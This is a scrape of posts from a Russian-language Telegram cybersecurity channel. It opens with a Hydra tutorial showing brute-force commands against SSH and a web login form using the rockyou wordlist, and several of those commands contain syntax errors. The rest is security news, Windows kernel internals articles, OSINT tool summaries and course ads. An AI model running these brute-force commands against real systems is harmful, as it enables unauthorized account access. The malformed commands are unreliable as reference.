Hydra 👩💻
Интересный инструмент для взлома пары логин/пароль, Hydra один из самых полезных предустановленных инструментов Kali linux.
Это программа для взлома логина\пароля. Представим, что есть узел 123.45.67.89, на нём SSH, это можно понять используя nmap.
Давайте попробуем подобрать к SSH логин и пароль используя знаменитый rockyou.txt.
🔸 Если вам уже известен логин или даже пароль, то можно заменить ключи и указать известный параметр.
или
🔸 Вместо ключей
🔸 Также можно запустить hydra с ключём
🔸 Если, вдруг SHH находится не на 22 порту, то можно использовать ключ
🔸 Также гидра можно брутфорсить страницы авторизации, например:
Интересный инструмент для взлома пары логин/пароль, Hydra один из самых полезных предустановленных инструментов Kali linux.
Это программа для взлома логина\пароля. Представим, что есть узел 123.45.67.89, на нём SSH, это можно понять используя nmap.
Давайте попробуем подобрать к SSH логин и пароль используя знаменитый rockyou.txt.
# hydra -P login.txt -P /usr/share/wordlists/rockyou.txt ssh://123.45.67.89
# hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://123.45.67.89
или
# hydra -L login.txt -p qwerty123456seven /usr/share/wordlists/rockyou.txt ssh://123.45.67.89
-L
/-P
, можно использовать -C
, если у вас есть файл с логинами и паролями к ним разделёнными двоеточиями.# hydra -C /home/root/Desktop/login_pass.txt ssh://123.45.67.89
-t
для установления количества параллельных подключений на цель.# hydra -P login.txt -P /usr/share/wordlists/rockyou.txt -t 8 ssh://123.45.67.89
-s
который изменит порт# hydra -P login.txt -P /usr/share/wordlists/rockyou.txt -s 22 ssh://123.45.67.89
# hydra -l admin -P /usr/share/wordlists/rockyou.txt vuln.com http-post-form "/login.php:login=admin&pass=^PASS^:invalid login!" -vV -f
Где -vV дебаг мод показывающий login+pass, -f - выход из программы при нахождении пароля и логина
Please open Telegram to view this post
VIEW IN TELEGRAM
👍24✍8👾6❤5👎1
FIDO Alliance опубликовал рабочий черновой вариант новых спецификаций для безопасного обмена учетными данными. Эти спецификации позволят пользователям безопасно переносить passkeys и все другие учетные данные между провайдерами.
💡 Представьте, что вы можете легко перейти с iPhone на Android и обратно, не теряя ни одного ключа безопасности!
Ключевые моменты:
🔸 Спецификации включают Credential Exchange Protocol (CXP) и Credential Exchange Format (CXF).
🔸 Они определяют стандартный формат для передачи учетных данных, включая пароли, passkeys и другие, на другой провайдер так, чтобы перевод был безопасным по умолчанию.
🔸 Пользователи смогут использовать одни и те же ключи безопасности независимо от операционной системы или устройства.
Кто за этим стоит?
🔸 Apple, Google, Microsoft и ведущие менеджеры паролей работают вместе — они создали специальные протоколы и форматы для безопасного обмена учетными данными между провайдерами.
#новости
Ключевые моменты:
Кто за этим стоит?
🗣️ «Вход с помощью паролей снижает риск фишинга и исключает повторное использование учетных данных, делая вход на 75% быстрее и на 20% более успешным, чем при использовании паролей или паролей плюс второго фактора, например одноразового пароля (OTP) по СМС» — заявили в Альянсе.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥6❤5👎4
Wireshark
Wireshark - это анализатор сетевых пакетов. Анализатор сетевых пакетов, который захватывает сетевые пакеты и пытается как можно подробнее отобразить данные пакета.
Программа подходит также сетевым администраторам, которые могут использовать его для устранения неполадок в сети, и для студентов, которые хотят изучить строение сетевых протоколов.
Нас интересуют только пакеты с протоколом tcp с портом 80, передаваемые по адресу что мы указали в ключе
Wireshark - это анализатор сетевых пакетов. Анализатор сетевых пакетов, который захватывает сетевые пакеты и пытается как можно подробнее отобразить данные пакета.
Программа подходит также сетевым администраторам, которые могут использовать его для устранения неполадок в сети, и для студентов, которые хотят изучить строение сетевых протоколов.
# tshark -f "tcp port 80" -i <ваша сетевая карта>
Нас интересуют только пакеты с протоколом tcp с портом 80, передаваемые по адресу что мы указали в ключе
-i
. Сущетсвует версия с графическим интерфейсам, более удобная для тех, кто не привык к работе в терминале.👍15🔥8❤7👾2👎1
This media is not supported in your browser
VIEW IN TELEGRAM
🚩 Новые задания на платформе Codeby Games!
🔑 Категория Криптография — Sophie German
🎢 Категория Разное — Чаепитие
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19❤10🔥7👾1
Эксперты связывают их успех с мощной моделью "вымогательство как услуга" (Ransomware-as-a-Service), в рамках которой они активно вербуют опытных хакеров, предлагая им более выгодные условия сотрудничества по сравнению с конкурентами.
Еще в начале года LockBit оставался лидером в мире вымогательского ПО, совершая втрое больше атак, чем ближайший конкурент Qilin. Однако, за третий квартал число атак, заявленных LockBit, сократилось на 88%, и теперь их число составило всего 188.
Это падение связывают с международной операцией правоохранительных органов, проведенной против LockBit в феврале 2024 года. Хотя группе удалось частично восстановиться во втором квартале, доверие со стороны их аффилиатов могло серьезно пострадать после того, как власти сообщили, что получили информацию, способную идентифицировать участников.
На фоне ослабления LockBit, другая группа — Qilin — наращивает свои атаки. В третьем квартале число их жертв выросло на 44%, достигнув отметки в 140.
Symantec отмечает интересный факт: разница между количеством атак, заявленных группами на сайтах утечек, и фактическими случаями, расследованными исследователями, может быть значительной.
🗣️ Например, LockBit заявляет о 15% всех атак, но реально причастен лишь к 7%. Для RansomHub эта цифра составила 33%, хотя они заявляют о 15% всех атак. Это может объясняться тем, что не все жертвы попадают на сайты утечек — если компании платят выкуп быстро, данные о них могут не публиковаться.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14❤6🔥6🤯2👎1
Есть знания, которыми вы хотите поделиться? 👀
Мы в поисках авторов, которые смогут писать интересные и актуальные статьи для нашего канала на тему:
🔸 Кибербезопасность
🔸 Хакерские техники и методы защиты
🔸 Сканирование, тестирование на уязвимости
🔸 Анализ атак и практические рекомендации
🔸 Актуальные новости из мира ИБ
Что мы предлагаем:
💬 Стать частью крупнейшего ИБ сообщества
✔️ Заинтересованную аудиторию
🖥 Профессиональный нетворкинг в сфере ИБ
💸 Денежное вознаграждение до 25 тысяч рублей
Ждем вашего отклика! Пишите:
🚀 @cdbwzrd
Мы в поисках авторов, которые смогут писать интересные и актуальные статьи для нашего канала на тему:
Что мы предлагаем:
Ждем вашего отклика! Пишите:
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤5🔥5
21 октября несколько пользователей и СМИ сообщили о получении электронного письма якобы от команды Internet Archive, в котором был распространён украденный токен доступа к Zendesk — платформе для управления клиентскими запросами. В письме утверждалось, что организация не удосужилась своевременно изменить ключи API, которые были скомпрометированы через их GitLab.
«Как демонстрирует это сообщение, токен Zendesk с доступом к 800 000+ заявкам на info@archive.org, начиная с 2018 года, оказался в руках посторонних лиц», — говорилось в письме. «Если не у меня, то у кого-то другого».
*Хотя письмо было отправлено неавторизованным источником, оно прошло проверки безопасности, что указывает на отправку с серверов Zendesk.
Исследовательская группа Vx-underground прокомментировала в соцсети X:
«Похоже, что злоумышленники продолжают иметь доступ к системам Internet Archive и пытаются отправить сигнал».
Джейк Мур, советник по кибербезопасности из ESET, отметил:
«Важно, чтобы компании быстро проводили полные аудиты после атак, так как злоумышленники будут неоднократно проверять новые системы защиты».
Скомпрометированный файл конфигурации GitLab
Internet Archive и его основатель Брюстер Кэйл пока не прокомментировали ситуацию.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8👍3🔥3😱3
В новой статье серии посвящённой кибер-разведке, мы узнаем о нескольких полезных инструментах для OSINT. Рассмотрим два мощных решения для анализа доменов и один инструмент для поиска почты по никнейму.
✔️ Back-Me-Up — это инструмент для автоматизированного поиска уязвимостей, который комбинирует возможности множества утилит для извлечения URL из интернет-архивов и анализа утечек конфиденциальных данных.
Back-Me-Up собирает ссылки из таких источников, как Wayback Machine, а затем фильтрует их, чтобы выявить важную информацию, например, файлы с расширениями
✔️ Enola-Finds — универсальный инструмент для сбора данных о доменах и веб-приложениях. Он использует сразу несколько утилит, таких как Nmap, Whois, Dirb, Nikto и SSLscan для сбора информации о хосте. Enola-Finds позволяет увидеть активные порты, версии сервисов, сертификаты SSL, а также другие важные данные, необходимые для кибер-исследования.
✔️ Наконец, Mailcat — это простой и удобный инструмент, который помогает найти существующие email-адреса по никнейму. Этот инструмент особенно полезен в ситуациях, когда нужно быстро и эффективно сопоставить ник с реальной почтой.
➡️ Подробности и примеры использования — читайте в статье!
Back-Me-Up собирает ссылки из таких источников, как Wayback Machine, а затем фильтрует их, чтобы выявить важную информацию, например, файлы с расширениями
.sql
, .bkp
, .txt
и другие. Это незаменимый инструмент для тех, кто занимается баг-баунти или OSINT-разведкой.Если вам нужно быстро собрать информацию о доменах, просканировать хосты или узнать, какие email-адреса связаны с конкретным ником — эти инструменты могут стать отличными помощниками в вашем исследовании. В статье вы найдёте пошаговые инструкции по их установке и использованию.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16❤5🔥4
Курс "Профессия Пентестер" — запись до 31 октября! 🎉
🙂 Научитесь атаковать сети, WEB-сайты, операционные системы и локальные устройства и проводить внутренний и внешний пентест
🙂 Участвуйте в BugBounty программах или постройте карьеру в сфере информационной безопасности
Полный цикл обучения:
⌨️ от освоения Kali Linux и администрирования, до написания эксплойтов и шелл-кода, обхода антивирусных решений
⌨️ от сетевой разведки до эксплуатации уязвимостей, повышения привилегий и закрепления в сети
Хотите стать пентестером?👀 Присоединяйтесь к нам – защищайте мир от угроз, находя уязвимости и предотвращая кибератаки!
🚀 @Codeby_Academy
🖥 Подробнее о курсе
Полный цикл обучения:
Хотите стать пентестером?
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15❤5🔥5👎1
WarmCookie передаётся через фальшивые письма с заманчивыми темами вроде предложений работы или счетов. Вредонос попадает в систему через вложения в письмах или встроенные гиперссылки. Его функционал включает:
WarmCookie тесно связан с хакерской группой TA866. Его функционал схож с другой вредоносной программой, Resident backdoor, ранее использованной этой группировкой.
WarmCookie продолжает развиваться: добавлены новые команды, улучшены механизмы стойкости и обнаружения песочниц. Эксперты прогнозируют дальнейшее усовершенствование программы для длительных кибершпионажных атак.
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13❤5🔥3🤔2
Согласно исследованию ISACA на Европейской конференции 2024 года, специалисты по кибербезопасности всё чаще остаются в стороне при разработке политик по использованию ИИ.
✏️ Только 35% из опрошенных 1800 специалистов участвуют в создании таких политик, а 45% вовсе не задействованы в разработке, внедрении или управлении ИИ-решениями.
💡 Несмотря на растущее число компаний, разрешающих генеративный ИИ на рабочем месте, кибербезопасность не всегда интегрируется в новые AI-стратегии, о чем заявил Крис Димитриадис, Chief Global Strategy Officer ISACA.
👀 По словам генерального директора ISACA, Эрика Пруша, управление рисками ИИ теперь лежит не только на CISO или CIO, а на всей команде, так как уязвимости зависят от каждого человека в организации.
Где уже применяется ИИ:
🔸 Автоматизация обнаружения и реагирования на угрозы (28%)
🔸 Безопасность конечных точек (27%)
🔸 Рутинные задачи (24%)
🔸 Обнаружение мошенничества (13%)
#новости
🗣️ "Мы стремимся к инновациям и улучшению клиентского опыта, фокусируясь на этике и комплаенсе, забывая про кибербезопасность, которая жизненно необходима", — подчеркнул Димитриадис.
Где уже применяется ИИ:
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍6🔥4
В первой статье нового цикла копнем глубже в архитектуру ядра Windows и обсудим такие интересные сущности, как объекты и дескрипторы. Пройдемся по основным структурам — от EPROCESS, которая "идентифицирует" процесс, до TABLE_ENTRY, которая хранит дескрипторы. И да, это та самая база, на которой строятся античиты и антивирусы.
⚙️ Процессы и Потоки
Создание процесса начинается с вызова
⚙️ Object, Handle и Identifier
В глазах ядра всё является *объектом* — от файлов до процессов. Каждый объект имеет дескриптор (handle), который предоставляет к нему доступ. Когда, например, открывается файл через
⚙️ Исследование объектов
На физическом уровне объект — это структура данных с заголовком
⚙️ Таблица Дескрипторов Процесса
Каждому процессу выделяется своя таблица дескрипторов
✏️ Продолжение следует: в следующей части обсудим больше интересных деталей системы, так что следите за обновлениями!
➡️ Читать подробнее
Создание процесса начинается с вызова
Kernel32!CreateProcess()
, который через цепочку Ntdll → ядро попадает в Nt/ZwCreateFile()
. Здесь создается основная структура процесса _EPROCESS
, включающая ядро планировщика _KPROCESS
. Каждый поток получает свою структуру _ETHREAD
, связанную с _EPROCESS
. Процессы идентифицируются по PID, а потоки по TID, что помогает ОС отслеживать и управлять их состоянием.В глазах ядра всё является *объектом* — от файлов до процессов. Каждый объект имеет дескриптор (handle), который предоставляет к нему доступ. Когда, например, открывается файл через
CreateFile()
, ядро создает объект и возвращает handle, по которому процесс может обращаться к объекту. Управление и подсчет ссылок на объекты происходит через два счетчика: Handle
и Pointer
, которые отслеживаются диспетчером объектов.На физическом уровне объект — это структура данных с заголовком
OBJECT_HEADER
. У него есть поле SecurityDescriptor
, хранящее доступ к объекту (DACL/ACE). Обычно драйверы и API возвращают только тело объекта (смещение 30h), скрывая доступ к заголовку. Но, имея адрес объекта, можно получить и доступ к заголовку, что важно при анализе системной безопасности.Каждому процессу выделяется своя таблица дескрипторов
HANDLE_TABLE
. Это ускоряет доступ к дескрипторам и управляется системой автоматически, выделяя виртуальные страницы памяти. Размер одной записи — 16 байт, из которых первые 8 — это указатель на OBJECT_HEADER
, а вторые — маска доступа GrantedAccess
. Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥10❤8
Известная группа Lazarus, включая её подразделение BlueNoroff, провела очередную сложную кибератаку, эксплуатируя новую уязвимость нулевого дня в Google Chrome 👀
🔍 Исследователи Kaspersky обнаружили эту кампанию, когда вредоносное ПО Manuscrypt, используемое Lazarus, инфицировало систему в России. В этот раз группа использовала уязвимость в движке V8 Chrome, позволяющую получить полный контроль над заражёнными устройствами.
Ключевые уязвимости:
🔸 CVE-2024-4947: Переписывание критических структур памяти в компиляторе Maglev Chrome
🔸 Обход песочницы V8: Позволил выполнить произвольный код
#новости
🗣️ Атака началась с сайта detankzone[.]com, который притворялся платформой DeFi-игры с NFT. Достаточно было посетить сайт через Chrome, чтобы сработала вредоносная программа, перехватывающая управление системой.
Ключевые уязвимости:
#новости
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯16❤10👍9🔥5👎2
🗣️ Статья включает практические примеры в отладчике WinDbg, так что знания можно сразу применить на практике. Рекомендуется к прочтению после первой части.
Подсистема Win32 в архитектуре Windows
Файлы Csrss.exe, Gdi32.dll и Win32k.sys
SSDT — System Service Descriptor Table
⚙️ В статье приводится демонстрация работы SSDT и SSDT Shadow в отладчике WinDbg. Указатели на обе таблицы можно обнаружить, подключившись к процессу GUI.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥12❤9
Согласно новому отчёту Email Threat Trends Report от Vipre Security Group, мошеннические атаки с использованием деловой переписки (BEC) составляют более половины всех фишинговых попыток, и производственные компании оказались особенно уязвимыми.
Основные данные отчёта
🔸 Из 1,8 миллиарда обработанных за квартал писем, 12% были классифицированы как вредоносные, а на BEC пришлось 58% всех фишинговых атак.
🔸 В 89% случаев атакующие выдавали себя за авторитетных лиц, чтобы вызвать доверие.
🔸 Производственный сектор оказался наиболее подверженным угрозам: 27% всех обработанных писем в этой отрасли оказались вредоносными.
⚙️ Рост атак на производственный сектор
На производственные компании стали чаще нацеливаться из-за возможности перенаправления платежей поставщиков на мошеннические счета. Кроме того, взлом корпоративных почтовых ящиков даёт доступ к другим компаниям и клиентам, позволяя отправлять поддельные запросы на документы для кражи учетных данных.
❓ Почему риск возрастает?
Многие сотрудники в секторе производства используют мобильные устройства для входа на рабочие площадки, что повышает вероятность попадания на фишинговые ссылки в условиях высокой занятости и стремления к соблюдению сроков.
🛡 ИИ в службе BEC-мошенничества
Отчёт отмечает, что 36% фишинговых писем с использованием BEC были созданы генеративным ИИ, что делает их более сложными для выявления. Злоумышленники также часто используют вложения и URL-перенаправления для обхода систем безопасности.
#новости #фишинг
Основные данные отчёта
На производственные компании стали чаще нацеливаться из-за возможности перенаправления платежей поставщиков на мошеннические счета. Кроме того, взлом корпоративных почтовых ящиков даёт доступ к другим компаниям и клиентам, позволяя отправлять поддельные запросы на документы для кражи учетных данных.
Многие сотрудники в секторе производства используют мобильные устройства для входа на рабочие площадки, что повышает вероятность попадания на фишинговые ссылки в условиях высокой занятости и стремления к соблюдению сроков.
Отчёт отмечает, что 36% фишинговых писем с использованием BEC были созданы генеративным ИИ, что делает их более сложными для выявления. Злоумышленники также часто используют вложения и URL-перенаправления для обхода систем безопасности.
#новости #фишинг
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤7🔥7
В третьей статье цикла обсудим архитектуру объектов USER и GDI, которые отвечают за графику и интерфейс Windows. Например, объект типа *Window* включает почти все элементы окна — кнопки, поля ввода, списки и чекбоксы, а GDI добавляет обрамление, фигуры, цвет и шрифты.
⚙️ Память и пулы Windows
Вся физическая память распределяется через системный диспетчер. Он выделяет большие объёмы через
Память делится на Paged Pool (может выгружаться на диск) и NonPaged Pool (всегда в ОЗУ). При старте создаётся несколько базовых пула для каждого пользователя в своей сессии, а также для всех системных служб. Это помогает системно управлять памятью и разграничивать процессы.
⚙️ USER и GDI: Память и объектная таблица
🔸 USER-объекты (интерфейсные элементы) хранятся в куче рабочего стола.
🔸 GDI-объекты (графические примитивы) получают память из NonPagedSessionPool.
Объекты GDI привязаны к контексту создающего их процесса. Например, передача кисти из одного процесса в другой с высокой вероятностью может привести к сбоям.
Дескрипторы объектов управляются глобальной таблицей в каждой сессии и индексируются в фиксированной таблице с лимитом в 65,536 объектов. Например,
⚙️ Объекты USER
USER-объекты индексируются в таблице дескрипторов каждой сессии, которая отображается в пользовательском пространстве каждого GUI-процесса. Указатель на таблицу USER хранится в
➡️ Читать подробнее
Вся физическая память распределяется через системный диспетчер. Он выделяет большие объёмы через
VirtualAlloc()
и мелкие через HeapAlloc()
, которые на уровне ядра обращаются к NtAllocateVirtualMemory()
и RtlAllocateHeap()
.Память делится на Paged Pool (может выгружаться на диск) и NonPaged Pool (всегда в ОЗУ). При старте создаётся несколько базовых пула для каждого пользователя в своей сессии, а также для всех системных служб. Это помогает системно управлять памятью и разграничивать процессы.
Объекты GDI привязаны к контексту создающего их процесса. Например, передача кисти из одного процесса в другой с высокой вероятностью может привести к сбоям.
Дескрипторы объектов управляются глобальной таблицей в каждой сессии и индексируются в фиксированной таблице с лимитом в 65,536 объектов. Например,
GDIProcessHandleQuota
в реестре ограничивает доступный для процесса лимит (по умолчанию — 10,000 дескрипторов).USER-объекты индексируются в таблице дескрипторов каждой сессии, которая отображается в пользовательском пространстве каждого GUI-процесса. Указатель на таблицу USER хранится в
win32k!gSharedInfo
, и её записи отображаются через массив HANDLEENTRY
, предоставляя быстрый доступ процессам без необходимости в вызовах ядра.🗣️ GDI и USER объекты — основа графической подсистемы Windows, которая позволяет управлять интерфейсом и графикой на уровне ядра.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍8❤7